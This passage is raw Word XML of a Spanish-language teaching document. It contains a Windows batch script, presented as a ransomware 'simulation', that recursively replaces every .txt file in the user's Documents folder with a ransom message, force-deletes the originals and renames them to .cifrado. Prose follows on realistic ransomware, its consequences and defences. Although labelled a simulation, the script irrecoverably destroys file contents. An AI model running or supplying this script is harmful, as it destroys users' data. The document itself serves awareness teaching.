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8DCDC" w14:textId="77777777" w:rsidR="00C9293B" w:rsidRDefault="00C9293B" w:rsidP="00C9293B">
      <w:r>
        <w:t>@echo off</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCDA33C" w14:textId="77777777" w:rsidR="00C9293B" w:rsidRDefault="00C9293B" w:rsidP="00C9293B">
      <w:r>
        <w:t>REM Carpeta objetivo (Ejemplo: Documentos del usuario)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFC214B" w14:textId="77777777" w:rsidR="00C9293B" w:rsidRPr="00C9293B" w:rsidRDefault="00C9293B" w:rsidP="00C9293B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9293B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>set "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C9293B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>target_folder</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C9293B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=C:\Users\%username%\Documents"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459614AF" w14:textId="77777777" w:rsidR="00C9293B" w:rsidRPr="00C9293B" w:rsidRDefault="00C9293B" w:rsidP="00C9293B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29A460A2" w14:textId="77777777" w:rsidR="00C9293B" w:rsidRDefault="00C9293B" w:rsidP="00C9293B">
      <w:r>
        <w:t>REM Extensión de los archivos a afectar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221BDF46" w14:textId="77777777" w:rsidR="00C9293B" w:rsidRDefault="00C9293B" w:rsidP="00C9293B">
      <w:r>
        <w:t>set "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>file_extension</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>txt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225151A7" w14:textId="77777777" w:rsidR="00C9293B" w:rsidRDefault="00C9293B" w:rsidP="00C9293B"/>
    <w:p w14:paraId="24B6499D" w14:textId="77777777" w:rsidR="00C9293B" w:rsidRDefault="00C9293B" w:rsidP="00C9293B">
      <w:r>
        <w:t>REM Mensaje de inicio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0032CCA1" w14:textId="77777777" w:rsidR="00C9293B" w:rsidRDefault="00C9293B" w:rsidP="00C9293B">
      <w:r>
        <w:t>echo Iniciando cifrado de archivos en %</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>target</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>_folder</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>%...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E0DFA1" w14:textId="77777777" w:rsidR="00C9293B" w:rsidRPr="00C9293B" w:rsidRDefault="00C9293B" w:rsidP="00C9293B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9293B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>timeout /t 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F00499" w14:textId="77777777" w:rsidR="00C9293B" w:rsidRPr="00C9293B" w:rsidRDefault="00C9293B" w:rsidP="00C9293B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AED3308" w14:textId="77777777" w:rsidR="00C9293B" w:rsidRPr="00C9293B" w:rsidRDefault="00C9293B" w:rsidP="00C9293B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9293B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">REM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C9293B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Bucle</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C9293B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> para </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C9293B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cifrar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C9293B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C9293B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>archivos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="38CB7E64" w14:textId="77777777" w:rsidR="00C9293B" w:rsidRPr="00C9293B" w:rsidRDefault="00C9293B" w:rsidP="00C9293B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9293B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for /r "%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C9293B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>target_folder</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C9293B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>%" %%f in (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C9293B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>*.%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C9293B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>file_extension</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C9293B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>%) do (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BC9CEA" w14:textId="77777777" w:rsidR="00C9293B" w:rsidRDefault="00C9293B" w:rsidP="00C9293B">
      <w:r w:rsidRPr="00C9293B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:t>echo Procesando archivo: %%f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDCADFF" w14:textId="77777777" w:rsidR="00C9293B" w:rsidRDefault="00C9293B" w:rsidP="00C9293B">
      <w:r>
        <w:t xml:space="preserve">    REM Cambiar contenido del archivo (simulación de cifrado)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0C0C8C" w14:textId="77777777" w:rsidR="00C9293B" w:rsidRDefault="00C9293B" w:rsidP="00C9293B">
      <w:r>
        <w:t xml:space="preserve">    &gt; "%%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>f.tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454A028B" w14:textId="77777777" w:rsidR="00C9293B" w:rsidRDefault="00C9293B" w:rsidP="00C9293B">
      <w:r>
        <w:t xml:space="preserve">        echo Este archivo ha sido cifrado. Contacta con admin@malware.com para recuperarlo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4350645D" w14:textId="77777777" w:rsidR="00C9293B" w:rsidRDefault="00C9293B" w:rsidP="00C9293B">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2723C4" w14:textId="77777777" w:rsidR="00C9293B" w:rsidRDefault="00C9293B" w:rsidP="00C9293B">
      <w:r>
        <w:t xml:space="preserve">    del /f /q "%%f</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>"  REM</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Eliminar el archivo original</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E940A31" w14:textId="77777777" w:rsidR="00C9293B" w:rsidRDefault="00C9293B" w:rsidP="00C9293B">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rename</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> "%%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>f.tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" "%%~</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>nf.cifrado</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>" REM Renombrar con nueva extensión</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5057DA88" w14:textId="77777777" w:rsidR="00C9293B" w:rsidRDefault="00C9293B" w:rsidP="00C9293B">
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5567805A" w14:textId="77777777" w:rsidR="00C9293B" w:rsidRDefault="00C9293B" w:rsidP="00C9293B"/>
    <w:p w14:paraId="7EB3DA94" w14:textId="77777777" w:rsidR="00C9293B" w:rsidRDefault="00C9293B" w:rsidP="00C9293B">
      <w:r>
        <w:t>REM Mensaje final</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D55075" w14:textId="77777777" w:rsidR="00C9293B" w:rsidRDefault="00C9293B" w:rsidP="00C9293B">
      <w:r>
        <w:t xml:space="preserve">echo Todos los archivos con la </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>extensión .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>file_extension</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>% han sido cifrados.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167C798A" w14:textId="77777777" w:rsidR="00C9293B" w:rsidRDefault="00C9293B" w:rsidP="00C9293B">
      <w:r>
        <w:t>echo Contacta con admin@malware.com para descifrar los archivos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1259372B" w14:textId="48B3877E" w:rsidR="00AE52F8" w:rsidRDefault="00C9293B" w:rsidP="00C9293B">
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:t>ause</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B164AC9" w14:textId="77777777" w:rsidR="00C9293B" w:rsidRDefault="00C9293B" w:rsidP="00C9293B"/>
    <w:p w14:paraId="034F8F3F" w14:textId="77777777" w:rsidR="00C9293B" w:rsidRDefault="00C9293B" w:rsidP="00C9293B"/>
    <w:p w14:paraId="42FB1749" w14:textId="77777777" w:rsidR="00C9293B" w:rsidRDefault="00C9293B" w:rsidP="00C9293B"/>
    <w:p w14:paraId="1C8758D4" w14:textId="77777777" w:rsidR="00C9293B" w:rsidRDefault="00C9293B" w:rsidP="00C9293B"/>
    <w:p w14:paraId="0E39849D" w14:textId="77777777" w:rsidR="00C9293B" w:rsidRDefault="00C9293B" w:rsidP="00C9293B"/>
    <w:p w14:paraId="75400C3C" w14:textId="77777777" w:rsidR="00C9293B" w:rsidRDefault="00C9293B" w:rsidP="00C9293B"/>
    <w:p w14:paraId="7EC747A4" w14:textId="77777777" w:rsidR="00C9293B" w:rsidRDefault="00C9293B" w:rsidP="00C9293B"/>
    <w:p w14:paraId="2F23095E" w14:textId="77777777" w:rsidR="00C9293B" w:rsidRDefault="00C9293B" w:rsidP="00C9293B"/>
    <w:p w14:paraId="602315CC" w14:textId="77777777" w:rsidR="00C9293B" w:rsidRPr="00C9293B" w:rsidRDefault="00C9293B" w:rsidP="00C9293B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9293B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>¿Qué hace este script?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0810C5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Define el directorio objetivo (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C9293B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>target</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C9293B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>_folder</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C9293B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00C9293B">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7978315A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>El script apunta a la carpeta de documentos del usuario actual.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130A3718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Procesa archivos con una extensión específica</w:t>
      </w:r>
      <w:r w:rsidRPr="00C9293B">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F04EB1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>Busca todos los archivos con la extensión .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C9293B">
        <w:t>txt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C9293B">
        <w:t xml:space="preserve"> en la carpeta objetivo y subcarpetas (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C9293B">
        <w:t>for</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C9293B">
        <w:t xml:space="preserve"> /r).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63078DE7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Modifica el contenido</w:t>
      </w:r>
      <w:r w:rsidRPr="00C9293B">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DBBA33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>Escribe un mensaje en un nuevo archivo temporal (%%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C9293B">
        <w:t>f.tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C9293B">
        <w:t>) indicando que el archivo ha sido "cifrado".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8303DB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Elimina el archivo original</w:t>
      </w:r>
      <w:r w:rsidRPr="00C9293B">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3037AD6B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>Utiliza del /f /q para eliminar el archivo original.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6304B8F0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Renombra el archivo ofuscado</w:t>
      </w:r>
      <w:r w:rsidRPr="00C9293B">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4737AB93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 xml:space="preserve">Cambia el nombre del archivo temporal y le asigna una nueva extensión </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C9293B">
        <w:t>(.cifrado</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C9293B">
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBDFED1" w14:textId="77777777" w:rsidR="00C9293B" w:rsidRPr="00C9293B" w:rsidRDefault="00C9293B" w:rsidP="00C9293B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9293B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mensajes al usuario</w:t>
      </w:r>
      <w:r w:rsidRPr="00C9293B">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE57EA7" w14:textId="77777777" w:rsidR="00C9293B" w:rsidRPr="00C9293B" w:rsidRDefault="00C9293B" w:rsidP="00C9293B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9293B">
        <w:t>Muestra mensajes indicando que los archivos han sido "cifrados" y proporciona un supuesto contacto.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B38A7A1" w14:textId="77777777" w:rsidR="00C9293B" w:rsidRPr="00C9293B" w:rsidRDefault="00C9293B" w:rsidP="00C9293B">
      <w:r w:rsidRPr="00C9293B">
        <w:pict w14:anchorId="7D3554F7">
          <v:rect id="_x0000_i1043" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5783B8F5" w14:textId="77777777" w:rsidR="00C9293B" w:rsidRPr="00C9293B" w:rsidRDefault="00C9293B" w:rsidP="00C9293B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9293B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>¿Cómo sería un ataque más realista?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735B774D" w14:textId="77777777" w:rsidR="00C9293B" w:rsidRPr="00C9293B" w:rsidRDefault="00C9293B" w:rsidP="00C9293B">
      <w:r w:rsidRPr="00C9293B">
        <w:t>Un ataque más realista implementaría algoritmos de cifrado reales (como AES-256 o RSA) utilizando scripts más avanzados en lenguajes como Python, PowerShell o incluso ejecutables binarios. Estos scripts cifrarían los archivos utilizando una clave privada y almacenarían la clave en un servidor remoto para impedir que las víctimas descifren los archivos sin pagar un rescate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16FCBF2F" w14:textId="77777777" w:rsidR="00C9293B" w:rsidRPr="00C9293B" w:rsidRDefault="00C9293B" w:rsidP="00C9293B">
      <w:r w:rsidRPr="00C9293B">
        <w:pict w14:anchorId="020977E7">
          <v:rect id="_x0000_i1044" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="793F2B70" w14:textId="77777777" w:rsidR="00C9293B" w:rsidRPr="00C9293B" w:rsidRDefault="00C9293B" w:rsidP="00C9293B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9293B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Consecuencias de un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C9293B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ransomware</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C9293B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> real:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07725ED4" w14:textId="77777777" w:rsidR="00C9293B" w:rsidRPr="00C9293B" w:rsidRDefault="00C9293B" w:rsidP="00C9293B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9293B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Archivos inutilizables</w:t>
      </w:r>
      <w:r w:rsidRPr="00C9293B">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49AC974C" w14:textId="77777777" w:rsidR="00C9293B" w:rsidRPr="00C9293B" w:rsidRDefault="00C9293B" w:rsidP="00C9293B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9293B">
        <w:t>Los archivos cifrados no pueden abrirse sin la clave correcta.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3525DB" w14:textId="77777777" w:rsidR="00C9293B" w:rsidRPr="00C9293B" w:rsidRDefault="00C9293B" w:rsidP="00C9293B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9293B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mensajes de rescate</w:t>
      </w:r>
      <w:r w:rsidRPr="00C9293B">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFA4E4C" w14:textId="77777777" w:rsidR="00C9293B" w:rsidRPr="00C9293B" w:rsidRDefault="00C9293B" w:rsidP="00C9293B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9293B">
        <w:lastRenderedPageBreak/>
        <w:t>Normalmente aparece un mensaje exigiendo un pago (en criptomonedas) para recuperar la clave de descifrado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9AB0AB" w14:textId="77777777" w:rsidR="00C9293B" w:rsidRPr="00C9293B" w:rsidRDefault="00C9293B" w:rsidP="00C9293B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9293B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Impacto en sistemas críticos</w:t>
      </w:r>
      <w:r w:rsidRPr="00C9293B">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C788217" w14:textId="77777777" w:rsidR="00C9293B" w:rsidRPr="00C9293B" w:rsidRDefault="00C9293B" w:rsidP="00C9293B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9293B">
        <w:t>Puede paralizar negocios enteros si afecta a servidores o sistemas esenciales.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56236A78" w14:textId="77777777" w:rsidR="00C9293B" w:rsidRPr="00C9293B" w:rsidRDefault="00C9293B" w:rsidP="00C9293B">
      <w:r w:rsidRPr="00C9293B">
        <w:pict w14:anchorId="4049893F">
          <v:rect id="_x0000_i1045" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B86DB0" w14:textId="77777777" w:rsidR="00C9293B" w:rsidRPr="00C9293B" w:rsidRDefault="00C9293B" w:rsidP="00C9293B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9293B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">¿Cómo protegerse contra </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C9293B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ransomware</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C9293B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6954C896" w14:textId="77777777" w:rsidR="00C9293B" w:rsidRPr="00C9293B" w:rsidRDefault="00C9293B" w:rsidP="00C9293B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9293B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Realizar copias de seguridad regulares</w:t>
      </w:r>
      <w:r w:rsidRPr="00C9293B">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749FFF8D" w14:textId="77777777" w:rsidR="00C9293B" w:rsidRPr="00C9293B" w:rsidRDefault="00C9293B" w:rsidP="00C9293B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9293B">
        <w:t>Almacenar copias fuera de línea o en servicios de almacenamiento en la nube seguros.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391BB4FE" w14:textId="77777777" w:rsidR="00C9293B" w:rsidRPr="00C9293B" w:rsidRDefault="00C9293B" w:rsidP="00C9293B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9293B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mantener el software actualizado</w:t>
      </w:r>
      <w:r w:rsidRPr="00C9293B">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FB35FC" w14:textId="77777777" w:rsidR="00C9293B" w:rsidRPr="00C9293B" w:rsidRDefault="00C9293B" w:rsidP="00C9293B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9293B">
        <w:t>Actualizar sistemas operativos, aplicaciones y antivirus para protegerse contra vulnerabilidades conocidas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E52E9DA" w14:textId="77777777" w:rsidR="00C9293B" w:rsidRPr="00C9293B" w:rsidRDefault="00C9293B" w:rsidP="00C9293B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9293B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Configurar políticas de acceso</w:t>
      </w:r>
      <w:r w:rsidRPr="00C9293B">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE219D9" w14:textId="77777777" w:rsidR="00C9293B" w:rsidRPr="00C9293B" w:rsidRDefault="00C9293B" w:rsidP="00C9293B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9293B">
        <w:t>Restringir el acceso a carpetas críticas y minimizar los privilegios de usuario.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160688E1" w14:textId="77777777" w:rsidR="00C9293B" w:rsidRPr="00C9293B" w:rsidRDefault="00C9293B" w:rsidP="00C9293B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9293B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>No ejecutar scripts desconocidos</w:t>
      </w:r>
      <w:r w:rsidRPr="00C9293B">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BDDAB6" w14:textId="77777777" w:rsidR="00C9293B" w:rsidRPr="00C9293B" w:rsidRDefault="00C9293B" w:rsidP="00C9293B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9293B">
        <w:t>Nunca abrir archivos .bat u otros scripts de fuentes desconocidas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757C29B7" w14:textId="77777777" w:rsidR="00C9293B" w:rsidRPr="00C9293B" w:rsidRDefault="00C9293B" w:rsidP="00C9293B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9293B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
